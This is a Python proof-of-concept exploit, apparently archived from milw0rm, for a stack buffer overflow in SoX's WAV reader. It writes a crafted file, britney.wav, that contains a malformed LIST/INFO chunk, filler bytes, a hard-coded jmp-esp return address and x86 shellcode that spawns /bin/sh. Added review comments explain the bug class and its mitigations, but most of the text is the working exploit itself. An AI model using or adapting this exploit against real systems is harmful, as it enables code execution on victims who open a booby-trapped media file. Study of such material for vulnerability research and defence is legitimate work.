# POC Exploit for SoX Stack Overflow Vulnerability found by Ulf Harnhammar
# Tested Under Slackware 9.1
# Serkan Akpolat sakpolat@gmx.net | deicide@siyahsapka.org
# Homepage: http://deicide.siyahsapka.org
# Greets to: Virulent
# deicide@gate:~$ play britney.wav
# sh-2.05b$

# Address of a "jmp %esp" instruction in libc.so on the author's test system
# (the file header names Slackware 9.1); change this if needed.
# NOTE(review): a hard-coded address like this only holds for one specific
# libc build and load address, which is why address-space randomisation and
# non-executable stacks are the standard mitigations for this bug class.
retJmpEsp = 0x4029824B
# intel_order() from MOSDEF
def intel_order(myint):
    """Return the low four bytes of *myint* as a 4-character string.

    The least-significant byte comes first (little-endian, "Intel order").
    Each character is ``chr()`` of one byte value in the range 0-255; any
    bits above the fourth byte are ignored.
    """
    # Shift by 0, 8, 16 and 24 bits in turn and keep the low byte each time.
    return "".join([chr((myint >> shift) % 256) for shift in (0, 8, 16, 24)])
# Python 2 script: the string literals below are byte strings.

# Wave Header
# RIFF/WAVE container with "fmt ", "fact" and an empty "data" chunk, followed
# by a LIST/INFO chunk.  The bytes end with an "ICRD" sub-chunk tag and its
# 4-byte length field (0x0000017e), so whatever is appended after `begin`
# is read as the contents of that field.
# NOTE(review): presumably this oversized INFO field is what overruns the
# stack buffer in the vulnerable SoX WAV reader -- the parser is not shown
# here, confirm against the SoX advisory.  If so, the fix class is a bounds
# check on INFO field lengths before they are copied.
begin = (
    "\x52\x49\x46\x46\x74\x05\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
    "\x32\x00\x00\x00\x02\x00\x01\x00\x70\x17\x00\x00\x00\x0c\x00\x00"
    "\x00\x01\x04\x00\x20\x00\xf4\x01\x07\x00\x00\x01\x00\x00\x00\x02"
    "\x00\xff\x00\x00\x00\x00\xc0\x00\x40\x00\xf0\x00\x00\x00\xcc\x01"
    "\x30\xff\x88\x01\x18\xff\x66\x61\x63\x74\x04\x00\x00\x00\x00\x00"
    "\x00\x00\x64\x61\x74\x61\x00\x00\x00\x00\x4c\x49\x53\x54\x9a\x01"
    "\x00\x00\x49\x4e\x46\x4f\x49\x41\x52\x54\x08\x00\x00\x00\x44\x65"
    "\x69\x63\x69\x64\x65\x00\x49\x43\x52\x44\x7e\x01\x00\x00"
)

# Machine-code payload placed after the overwritten return address; the sample
# session in the file header shows a shell prompt after `play britney.wav`.
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

# File layout: header, 300 filler bytes ("boom" * 75), the 4-byte
# little-endian address from intel_order(), then the payload.
evilBuf = "".join([begin, "boom" * 75, intel_order(retJmpEsp), shellcode])

# Write the crafted file to the current directory in binary mode.
wavFile = open("britney.wav", "wb")
wavFile.write(evilBuf)
wavFile.close()
print("Evil Song has been created :Pp")

# milw0rm.com [2004-08-01]